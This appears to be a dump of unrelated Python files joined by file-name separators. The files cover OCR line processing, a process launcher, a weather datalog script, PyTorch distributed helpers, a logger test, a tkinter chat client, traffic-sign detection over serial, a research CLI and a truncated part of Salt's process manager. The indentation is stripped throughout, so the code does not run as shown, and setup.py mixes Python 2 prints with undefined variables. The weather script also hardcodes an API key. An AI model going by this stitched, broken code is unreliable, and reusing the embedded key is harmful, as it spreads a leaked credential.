if region!=None and len(region)>0 and 'regions' in region.keys():
for line_idx,line in enumerate(region['regions']):
page_lines.append(line)
mode_height = frequent_height(page_lines)
return mode_height
def multi_processing_tesseract(page_regions,image_path,lang,width,height):
try:
img = cv2.imread(image_path)
mode_height = get_mode_height(page_regions)
if len(page_regions)>0:
total_lines=0
for rgn_idx, region in enumerate(page_regions):
if region!=None and len(region)>0 and 'regions' in region.keys():
for line_idx,line in enumerate(region['regions']):
line=[line]
if config.IS_DYNAMIC:
line = coord_adjustment(image_path,line)
if len(line)>0:
total_lines+=1
if config.MULTIPROCESS:
add_lines_to_tess_queue(line,tessract_queue,lang,img,mode_height,rgn_idx,line_idx)
if config.MULTIPROCESS==False and len(line)>0:
vertices = line[0]['boundingBox']['vertices']
left = vertices[0]['x']; top = vertices[0]['y']
image_crop = crop_region(line[0],img)
if image_crop is not None and image_crop.shape[1] >3 and image_crop.shape[0] > 3:
words = get_tess_text(image_crop,lang,mode_height,left,top)
page_regions[rgn_idx]['regions'][line_idx]['regions'] = copy.deepcopy(words)
if config.MULTIPROCESS:
while file_writer_queue.qsize()<total_lines:
pass
page_words = get_queue_words()
page_regions = collate_words(page_regions,page_words)
return page_regions
else:
return page_regions
except Exception as e:
log_exception("Error in tesseract ocr", app_context.application_context, e)
return page_regions
|
main.py | #!/bin/python3.8
import subprocess
import json
import time
import threading
class Interrupt ():
def __init__(self, code: int, response: str):
self.code = code
self.response = response
def __repr__(self):
return str(self.__dict__)
class Program ():
def __init__(self, exec: str, interrupts=[], reopen=False):
self.exec = exec
self.interrupts = [Interrupt(**i) for i in interrupts]
self.reopen = reopen
self.command = self.exec.split(' ')
self.process = None
self.thread_loop = threading.Thread(target=self.thread_run)
self.thread_loop.start()
def thread_run(self):
if not self.process:
self.process = subprocess.Popen(self.command)
main_thread = threading.main_thread()
while main_thread.is_alive():
code = self.process.poll()
self.exec_interrupt(code)
if code != None and self.reopen:
self.close()
self.process = subprocess.Popen(self.command)
self.close()
exit(0)
def exec_interrupt(self, code: int):
interrupt = self.interrupt_key(code)
if interrupt == None:
return
elif interrupt == 'close':
self.close()
self.reopen = False
def interrupt_key(self, key: int):
f = list(filter(lambda x: x.code == key, self.interrupts))
if len(f) > 0:
return f[0]
return None
def close(self):
self.process.terminate()
def __repr__(self):
return str(self.__dict__)
def main():
file = open('startup.json')
startup = json.load(file)
programs = [Program(**program) for program in startup]
[print(program, '\n') for program in programs]
while True:
time.sleep(0.1)
if __name__ == "__main__":
main()
|
main.py | import datetime
import json
import logging
import random
import sys
import requests
import threading
import time
import robonomicsinterface as RI
from typing import List
# set up logging
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s: %(message)s",
)
API_KEY = 'f601b0c9e92272482e5403fb30a9be7a'
BASE_URL = "https://api.openweathermap.org/data/2.5/weather?"
def get_weather() -> List[str] or None:
city_num = random.randrange(len_city_list)
city_id = city_list[city_num]["id"]
city_name = city_list[city_num]["name"] + ', ' + city_list[city_num]["country"]
url = BASE_URL + "id=" + str(city_id) + "&appid=" + API_KEY
response = requests.get(url)
if response.status_code == 200:
data = response.json()
main_inf = data['main']
temperature = str(round((main_inf['temp'] - 273), 2))
humidity = main_inf['humidity']
pressure = main_inf['pressure']
report = data['weather'][0]['description']
response.close()
return {"city": city_name, "temperature": temperature, "humidity": humidity,
"pressure": pressure, "report": report}
else:
logging.error("Error in the weather HTTP request")
response.close()
return None
def send_datalog() -> bool:
try:
logging.info("Sending weather request")
weather_data = get_weather()
if weather_data:
logging.info(f"Got weather in {str(weather_data['city'])}")
weather_report = f'Weather in {str(weather_data["city"])} at {str(datetime.datetime.now())} is: ' \
f'temperature: {str(weather_data["temperature"])} ' \
f'humidity: {str(weather_data["humidity"])} ' \
f'pressure: {str(weather_data["pressure"])} ' \
f'report: {str(weather_data["report"])}'
logging.info("Sending datalog")
interface.record_datalog(weather_report)
return True
else:
interface.record_datalog(f'Failed to get current weather in {weather_data["city"]} '
f'at {datetime.datetime.now()}')
return False
except Exception as e:
logging.error(f"Failed to send datalog: {e}")
return False
if __name__ == '__main__':
seed = sys.argv[1]
interface = RI.RobonomicsInterface(seed=seed)
logging.info(f"Reading Cities list")
with open('city.list.json') as json_file:
city_list = json.load(json_file)
len_city_list = len(city_list)
while True:
threads_num = threading.activeCount()
if threads_num > 12:
logging.warning(f"Too many active threads: {threads_num}. Idling")
time.sleep(12)
continue
send_datalog_thread = threading.Thread(target=send_datalog)
send_datalog_thread.start()
time.sleep(2)
logging.info(f"Active threads count: {threads_num}")
|
distributed.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Distributed helpers."""
import multiprocessing
import os
import signal
import threading
import traceback
import torch
from xnas.core.config import cfg
def is_master_proc():
"""Determines if the current process is the master process.
Master process is responsible for logging, writing and loading checkpoints. In
the multi GPU setting, we assign the master role to the rank 0 process. When
training using a single GPU, there is a single process which is considered master.
"""
return cfg.NUM_GPUS == 1 or torch.distributed.get_rank() == 0
def init_process_group(proc_rank, world_size):
"""Initializes the default process group."""
# Set the GPU to use
torch.cuda.set_device(proc_rank)
# Initialize the process group
torch.distributed.init_process_group(
backend=cfg.DIST_BACKEND,
init_method="tcp://{}:{}".format(cfg.HOST, cfg.PORT),
world_size=world_size,
rank=proc_rank,
)
def destroy_process_group():
"""Destroys the default process group."""
torch.distributed.destroy_process_group()
def scaled_all_reduce(tensors):
"""Performs the scaled all_reduce operation on the provided tensors.
The input tensors are modified in-place. Currently supports only the sum
reduction operator. The reduced values are scaled by the inverse size of the
process group (equivalent to cfg.NUM_GPUS).
"""
# There is no need for reduction in the single-proc case
if cfg.NUM_GPUS == 1:
return tensors
# Queue the reductions
reductions = []
for tensor in tensors:
reduction = torch.distributed.all_reduce(tensor, async_op=True)
reductions.append(reduction)
# Wait for reductions to finish
for reduction in reductions:
reduction.wait()
# Scale the results
for tensor in tensors:
tensor.mul_(1.0 / cfg.NUM_GPUS)
return tensors
class ChildException(Exception):
"""Wraps an exception from a child process."""
def __init__(self, child_trace):
super(ChildException, self).__init__(child_trace)
class ErrorHandler(object):
"""Multiprocessing error handler (based on fairseq's).
Listens for errors in child processes and propagates the tracebacks to the parent.
"""
def __init__(self, error_queue):
# Shared error queue
self.error_queue = error_queue
# Children processes sharing the error queue
self.children_pids = []
# Start a thread listening to errors
self.error_listener = threading.Thread(target=self.listen, daemon=True)
self.error_listener.start()
# Register the signal handler
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
"""Registers a child process."""
self.children_pids.append(pid)
def listen(self):
"""Listens for errors in the error queue."""
# Wait until there is an error in the queue
child_trace = self.error_queue.get()
# Put the error back for the signal handler
self.error_queue.put(child_trace)
# Invoke the signal handler
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, _sig_num, _stack_frame):
"""Signal handler."""
# Kill children processes
for pid in self.children_pids:
os.kill(pid, signal.SIGINT)
# Propagate the error from the child process
raise ChildException(self.error_queue.get())
def run(proc_rank, world_size, error_queue, fun, fun_args, fun_kwargs):
"""Runs a function from a child process."""
try:
# Initialize the process group
init_process_group(proc_rank, world_size)
# Run the function
fun(*fun_args, **fun_kwargs)
except KeyboardInterrupt:
# Killed by the parent process
pass
except Exception:
# Propagate exception to the parent process
error_queue.put(traceback.format_exc())
finally:
# Destroy the process group
destroy_process_group()
def multi_proc_run(num_proc, fun, fun_args=(), fun_kwargs=None):
"""Runs a function in a multi-proc setting (unless num_proc == 1)."""
# There is no need for multi-proc in the single-proc case
fun_kwargs = fun_kwargs if fun_kwargs else {}
if num_proc == 1:
fun(*fun_args, **fun_kwargs)
return
# Handle errors from training subprocesses
error_queue = multiprocessing.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Run each training subprocess
ps = []
for i in range(num_proc):
p_i = multiprocessing.Process(
target=run, args=(i, num_proc, error_queue, fun, fun_args, fun_kwargs)
)
ps.append(p_i)
p_i.start()
error_handler.add_child(p_i.pid)
# Wait for each subprocess to finish
for p in ps:
p.join()
|
test_logger_runner.py | #!/usr/bin/env python3
import logging
import os
import sys
import tempfile
import threading
import time
import unittest
import warnings
sys.path.append('.')
from logger.readers.text_file_reader import TextFileReader
from logger.writers.text_file_writer import TextFileWriter
from server.logger_runner import LoggerRunner, run_logging
CONFIG = {
"modes": {
"off": {},
"on": {
"logger": {
"readers": {
"class": "TextFileReader",
"kwargs": {
"interval": 0.1,
"tail": True
} # we'll fill in filespec once we have tmpdir
},
"writers": {
"class": "TextFileWriter",
"kwargs": {} # we'll fill in filespec once we have tmpdir
}
}
}
},
"default_mode": "off"
}
SAMPLE_DATA = """Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation files
(the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge,
publish, distribute, sublicense, and/or sell...""".split('\n')
################################################################################
class TestLoggerRunner(unittest.TestCase):
############################
def setUp(self):
# To suppress resource warnings about unclosed files
warnings.simplefilter("ignore", ResourceWarning)
# Create a file
self.temp_dir = tempfile.TemporaryDirectory()
self.temp_dir_name = self.temp_dir.name
self.source_name = self.temp_dir_name + '/source.txt'
self.dest_name = self.temp_dir_name + '/dest.txt'
# Create the source file
writer = TextFileWriter(self.source_name)
for line in SAMPLE_DATA:
writer.write(line)
# Fill in the readers and writers in the config
self.config = CONFIG
self.config['modes']['on']['logger']['readers']['kwargs']['file_spec'] = self.source_name
self.config['modes']['on']['logger']['writers']['kwargs']['filename'] = self.dest_name
############################
def test_basic(self):
# Assure ourselves that the dest file doesn't exist yet and that
# we're in our default mode
self.assertFalse(os.path.exists(self.dest_name))
runner = LoggerRunner(interval=0.1)
runner_thread = threading.Thread(target=runner.run, daemon=True)
runner_thread.start()
runner.set_configs(self.config['modes']['on'])
time.sleep(0.6)
reader = TextFileReader(self.dest_name)
for line in SAMPLE_DATA:
logging.info('Checking line: "%s"', line)
self.assertEqual(line, reader.read())
self.assertTrue(runner.processes['logger'].is_alive())
pid = runner.processes['logger'].pid
status = runner.check_loggers()
self.assertDictEqual(status,
{'logger': {'config': 'unknown',
'errors': [],
'running': True,
'pid': pid,
'failed': False}
})
runner.set_configs(self.config['modes']['off'])
time.sleep(0.1)
self.assertDictEqual(runner.check_loggers(), {})
# Verify that the process has indeed shut down. This should throw
# an exception if the process doesn't exist.
with self.assertRaises(ProcessLookupError):
os.kill(pid, 0)
# Try shutting down
runner.quit()
runner_thread.join(2.0)
self.assertFalse(runner_thread.is_alive())
################################################################################
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbosity', dest='verbosity',
default=0, action='count',
help='Increase output verbosity')
args = parser.parse_args()
LOGGING_FORMAT = '%(asctime)-15s %(message)s'
logging.basicConfig(format=LOGGING_FORMAT)
LOG_LEVELS ={0:logging.WARNING, 1:logging.INFO, 2:logging.DEBUG}
args.verbosity = min(args.verbosity, max(LOG_LEVELS))
logging.getLogger().setLevel(LOG_LEVELS[args.verbosity])
#logging.getLogger().setLevel(logging.DEBUG)
unittest.main(warnings='ignore')
|
client.py | import time
from tkinter import *
from PIL import Image, ImageTk
import socket
from time import sleep
import threading
import sys
c = socket.socket()
HOST = 'localhost'
PORT = 5000
HEADER = 1024
def connect_to_server():
global c
try:
c.connect((HOST, PORT))
welcomeScreen()
except socket.error as msg:
print('Connection error: ' + str(msg) + '. Retrying...')
sleep(1)
connect_to_server()
def navigateToChatScreen(tk):
tk.destroy()
chatScreen()
def exitApp(tk):
c.send(bytes('exit', 'utf-8'))
tk.destroy()
def welcomeScreen():
def startfun(username, tk):
global c
if (len(username) == 0):
return
name = username
c.send(bytes(name, 'utf-8'))
navigateToChatScreen(tk)
tk = Tk()
tk.geometry("300x500")
tk.minsize(300, 500)
tk.maxsize(300, 500)
tk.config(bg="white")
resize_welcome_image = Image.open("welcome.png").resize((300, 250))
welcomeImg = ImageTk.PhotoImage(resize_welcome_image)
welcomeImage = Label(tk, image=welcomeImg, bg="white").place(x=0, y=0)
user_name = Label(tk, text="Username :", bg="white").place(x=10, y=280)
user_name_field = StringVar()
userNameBox = Entry(tk, textvariable=user_name_field, font=('calibre', 10, 'normal'), border=2, width=28)
userNameBox.place(x=80, y=280)
startChatImage = Image.open("start.png")
resize_chat_image = startChatImage.resize((100, 100))
startChatImg = ImageTk.PhotoImage(resize_chat_image)
startButton = Button(tk, image=startChatImg, command=lambda: startfun(user_name_field.get(), tk), borderwidth=0)
startButton.place(x=90, y=350)
tk.mainloop()
def chatScreen():
tk = Tk()
tk.geometry("300x500")
tk.minsize(300, 500)
tk.maxsize(300, 500)
tk.config(bg="white")
exitChatRoom = Image.open("exit.png")
resize_exit_image = exitChatRoom.resize((150, 50))
exitImg = ImageTk.PhotoImage(resize_exit_image)
exitButton = Button(tk, image=exitImg, bg="white", command=lambda: exitApp(tk), borderwidth=0)
exitButton.place(x=70, y=10)
messageListBox = Listbox(tk, height=20, width=43)
messageListBox.place(x=15, y=80)
message = StringVar()
messageBox = Entry(tk, textvariable=message, font=('calibre', 10, 'normal'), border=2, width=32)
messageBox.place(x=15, y=444)
sendMessageImage = Image.open("send.png")
resize_send_image = sendMessageImage.resize((30, 30))
sendImg = ImageTk.PhotoImage(resize_send_image)
sendButton = Button(tk, image=sendImg, bg="white", command=lambda: send_message(message.get()), borderwidth=0)
sendButton.place(x=250, y=440)
def handle_message():
global c
while True:
data = c.recv(HEADER).decode('utf-8')
if data == 'exit':
exit()
messageListBox.insert(messageListBox.size(), data)
print(data)
def send_message(msg):
global c
if (len(msg) == 0):
return
c.send(bytes(msg, 'utf-8'))
messageBox.delete(0, 'end')
messageListBox.insert(messageListBox.size(), "You: " + msg)
global t, t1
t = threading.Thread(target=handle_message)
t.start()
t1 = threading.Thread(target=send_message(""))
t1.start()
tk.mainloop()
global t, t1
connect_to_server()
t1.join()
t.join()
c.close()
exit(0) |
setup.py | import cv2
import numpy as np
import serial
import threading
from time import sleep
stop_Cascade = cv2.CascadeClassifier('stop_sign.xml')
speed_Cascade = cv2.CascadeClassifier('haarCascade.xml')
yield_Cascade = cv2.CascadeClassifier('yield.xml')
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('Alert.avi', fourcc, 10.0, (640,480))
#ser = serial.Serial("COM6", 9600, timeout=1)
cap = cv2.VideoCapture(0)
speed_Sign = False
stop_Sign = False
yeild_Sign = False
"""def process():
while True:
print ('f')
global stop_Sign
if stop_Sign:
print("Stop ahead")
ser.write(b's')
ser.flush()
else :
ser.write(b'x')
print ("dfdg")
s=threading.Thread(target=process)
s.start()
"""
def read():
while True:
data = ser.read(9999)
if len(data) > 0:
print 'Got:', data
sleep(0.5)
print 'not blocked'
while True:
ser = serial.Serial("COM6", 9600, timeout=1)
if ser.isOpen():
ser.close()
ser.open()
t1 = threading.Thread(target=read, args=())
t1.start()
ret, img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
#Detecing the pannels
stop = stop_Cascade.detectMultiScale(gray,1.3,5)#Part of detection
speed = speed_Cascade.detectMultiScale(gray, 1.3, 5)
yield_sign = yield_Cascade.detectMultiScale(gray, 1.3, 5)
for(x,y,w,h) in stop :
cv2.rectangle(img,(x,y),(x+w,y+h),(100,100,0) , 2) # draw the rectangle around the yield sign
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img,'Stop',(x , y), font,1 ,(0,0,255), 2 , cv2.LINE_AA) #write in front of the detected object
stop_Sign = True
if data[0] == "j":
print("Stop ahead")
ser.write('s')
for(ex,ey,ew,eh) in speed :
cv2.rectangle(img, (ex, ey), (ex + ew, ey + eh), (100, 100, 0), 2) # draw the rectangle around the yield sign
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, 'Watch your speed"SPEED LIMIT"', (ex, ey), font, 1, (0, 0, 255), 3,cv2.LINE_AA) # write in front of the detected object speed_Sign = True
if speed_Sign:
print("Watch your speed'SPEED LIMIT'")
ser.write('w')
for(gx,gy,gw,gh) in yield_sign :
cv2.rectangle(img, (gx, gy), (gx + gw, gy + gh), (100, 100, 0), 2) # draw the rectangle around the yield sign
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(img, 'Yield', (gx, gy), font, 1, (0, 0, 255), 3,cv2.LINE_AA) # write in front of the detected object
yeild_Sign = True
if yeild_Sign and data =="j" :
print("Yield Ahead")
ser.write('y')
cv2.imshow('img',img)
out.write(img)
k = cv2.waitKey(30) & 0xff
if k == 27:
break
ser.close()
cap.release()
out.release()
cv2.destroyAllWindows()
|
human_friendly.py | """This module manages the interaction with the user and
sends the user's commands to a file read by the artificial
primary investigator."""
normal = """The computer is currently running Theodore's AP Research project
between midnight and 2:30 pm. Type 'quit' to safely quit the program.
Type 'options' to get more options."""
options = """Type 'quit' to safely quit the program.
Type 'options' to get this options message.
Type 'adjourn' to get the program to cease operations until midnight.
Type 'reload' to tell the Artificial Primary Investigator (API) that conditions may have changed.
Type 'reset algorithm_name1 algorithm_name2' to get the API to reset all the trials where
algorithm_name1 was tested to see if it is evolutionary stable (ES) against algorithm_name2.
Type 'reset algorithm_name all' to get the API to reset all the trials where every algorithm was
tested to see if it is ES against algorithm_name.
Type 'reset all algorithm_name' to get the API to reset all the trials where algorithm_name was
tested to see if it is ES against all other algorithms.
Type 'reset all all' to get the API to reset ALL the trials. This is reversible, but you have to
know how API thinks. Be careful.
Type 'confidence value' to tell the API to reload and conduct trials aiming for confidence value.
You can set value to be anywhere in (0,1), but you probably want to choose 0.99 or 0.95, which
means that the API tries to become 99% sure that a strategy is (or isn't) ES against another.
Type 'max_trials value' to tell the API the maximum number of trials it can run where one
algorithm is testing for being ES against another. max_trials overrides
any consideration of confidence.
Type 'min_trials value' to tell the API the minimum number of trials it must run where one
algorithm is testing for being ES against another. min_trials overrides
any consideration of confidence.
Type 'max_time value' to tell the API the maximum amount of time (seconds) it can run where one
algorithm is testing for being ES against another. max_time overrides
any consideration of confidence or trials.
Type 'min_time value' to tell the API the minimum amount of time (seconds) it must run where one
algorithm is testing for being ES against another. min_time overrides
any consideration of confidence or trials.
Type 'redo_confidence' to tell API that it needs to redo all the confidences, but the trials
can be left alone. (This is a good option after you have fixed a bug in bayesian.py.)
Type 'get_results' to tell API to make a short version of all its confidences, which will be
saved in the Results folder."""
error = (
"""Sorry, I did not recognize that command. Are you sure you typed it correctly?"""
)
starting = """Starting the Artificial Primary Investigator (API)"""
quitting = """I told the Artificial Primary Investigator (API) to quit. It will quit in a few minutes."""
# done_quitting = '''I have quit.'''
work_during_day = """WARNING: The API is set up to always work, which could affect the results
Only proceed if you are testing the program, and please reset everything
afterwards."""
def main(daytime_run=False):
import time
import api
import os
try:
f = open("Results/human_friendly_to_api.txt", "a")
f.close()
except IOError:
os.system("mkdir Results")
try:
f = open("Results/Readable/testing.txt", "a")
f.close()
except IOError:
os.system("mkdir Results/Readable")
print(time.asctime() + ": " + starting)
if daytime_run:
print(time.asctime() + ": " + work_during_day)
# t1 = multiprocessing.Process( target = api.main, args = [daytime_run] )
# t1 = threading.Thread( target = api.main, args = [daytime_run] )
# t1.start()
# #Starts the API here, using multi-processing
# #so human_friendly will be free to continue
if not daytime_run:
os.system("python -c 'import api;api.main()' &")
else:
os.system("python -c 'import api;api.main(True)' &")
response = ""
while True:
print(time.asctime() + ": " + normal)
response_OK = False
while not response_OK:
response = input().lower().rstrip().lstrip()
if formatted(response):
response_OK = True
else:
print(time.asctime() + ": " + error)
# Do something based on the response
if response == "options":
print(time.asctime() + ": " + options)
elif response == "quit":
break
else:
# Contact API with the message
f = open("Results/human_friendly_to_api.txt", "a")
f.write(str(time.time()) + ":" + response + "\n")
f.close()
# Contact API and tell it to quit
f = open("Results/human_friendly_to_api.txt", "a")
f.write(str(time.time()) + ":" + response + "\n")
f.close()
print(time.asctime() + ": " + quitting)
# #Wait until the API quits
# t1.join()
# print( time.asctime() + ": " + done_quitting )
def formatted(command):
"""Detects whether command is acceptable."""
if "official" in command:
return False
new = command.split()
if len(new) == 1:
return new[0] in [
"quit",
"options",
"adjourn",
"reload",
"redo_confidence",
"get_results",
]
elif len(new) == 3:
return new[0] in ["reset"]
elif len(new) == 2:
return new[0] in [
"confidence",
"min_trials",
"max_trials",
"min_time",
"max_time",
]
else:
return False
|
process.py | # -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
import salt.defaults.exitcodes
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
Since there isn't much use for this class as of right now this implementation
Only supports daemonized threads and will *not* return results
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
# During shutdown, `queue` may not have an `Empty` atttribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
Create a processes and args + kwargs
This will deterimine if it is a Process class, otherwise it assumes
it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
# Need to ensure that 'log_queue' is correctly transfered to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal):
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal)
except OSError as exc:
if exc.errno != errno.ESRCH:
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.trace('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows() and not async:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
elif async is True:
yield gen.sleep(10)
elif async is False:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid {0}: {1}'.format(pid, p_map['Process']))
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
